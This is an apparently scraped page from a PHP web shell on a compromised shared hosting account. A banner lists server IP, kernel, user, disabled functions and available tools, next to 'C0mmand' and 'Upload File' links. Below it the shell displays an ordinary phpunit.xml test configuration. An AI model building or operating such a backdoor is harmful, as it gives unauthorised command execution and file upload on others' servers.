|
Server IP : 10.111.20.6 / Your IP : 216.73.217.121 Web Server : Apache System : Linux webm006.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : edizioni ( 7252) PHP Version : 8.3.23 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/edizioni/stampaeweb/../wordpress/../extonymask/book/Jobs/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?xml version="1.0" encoding="UTF-8"?>
<!-- doc: https://phpunit.readthedocs.io/en/latest/configuration.html -->
<!-- manpage: https://manpages.debian.org/testing/phpunit/phpunit.1.en.html -->
<phpunit bootstrap = "./tests/autoload.php"
backupGlobals = "false"
backupStaticAttributes = "false"
colors = "true"
convertErrorsToExceptions = "true"
convertNoticesToExceptions = "true"
convertWarningsToExceptions = "true"
processIsolation = "false"
stopOnFailure = "false"
cacheResultFile = "./var/cache/.phpunit.result.cache"
verbose = "false"
defaultTestSuite = "all"
>
<!-- organizing tests: https://phpunit.readthedocs.io/en/latest/organizing-tests.html -->
<testsuites>
<!-- https://phpunit.readthedocs.io/en/latest/configuration.html#the-testsuite-element -->
<!-- run only specificed tests: 'phpunit -_-filter [path/to/*Test.php / folder with tests]' -->
<!-- run only a specific testsuite: 'phpunit -_-testsuite <testsuite-name>' -->
<testsuite name="all">
<directory>./tests</directory>
</testsuite>
<testsuite name="application">
<directory>./tests/Application</directory>
</testsuite>
<testsuite name="domain">
<directory>./tests/Domain</directory>
</testsuite>
<testsuite name="plugins">
<directory>./tests/Plugins</directory>
</testsuite>
<testsuite name="presenters">
<directory>./tests/Presenters</directory>
</testsuite>
<testsuite name="webservice">
<directory>./tests/WebService</directory>
</testsuite>
<testsuite name="webservices">
<directory>./tests/WebServices</directory>
</testsuite>
</testsuites>
<!-- to generate coverage report: phpunit -_-coverage-html ./var/ -->
<coverage cacheDirectory="./var/cache/phpunit">
<include>
<directory suffix=".php">Controls</directory>
<directory suffix=".php">Domain</directory>
<directory suffix=".php">Jobs</directory>
<directory suffix=".php">lib</directory>
<directory suffix=".php">Pages</directory>
<directory suffix=".php">Plugins</directory>
<directory suffix=".php">Presenters</directory>
<directory suffix=".php">Web</directory>
<directory suffix=".php">WebServices</directory>
</include>
<exclude>
<directory suffix=".php">lib/external</directory>
</exclude>
</coverage>
<php>
<env name="APP_ENV" value="testing"/>
</php>
</phpunit>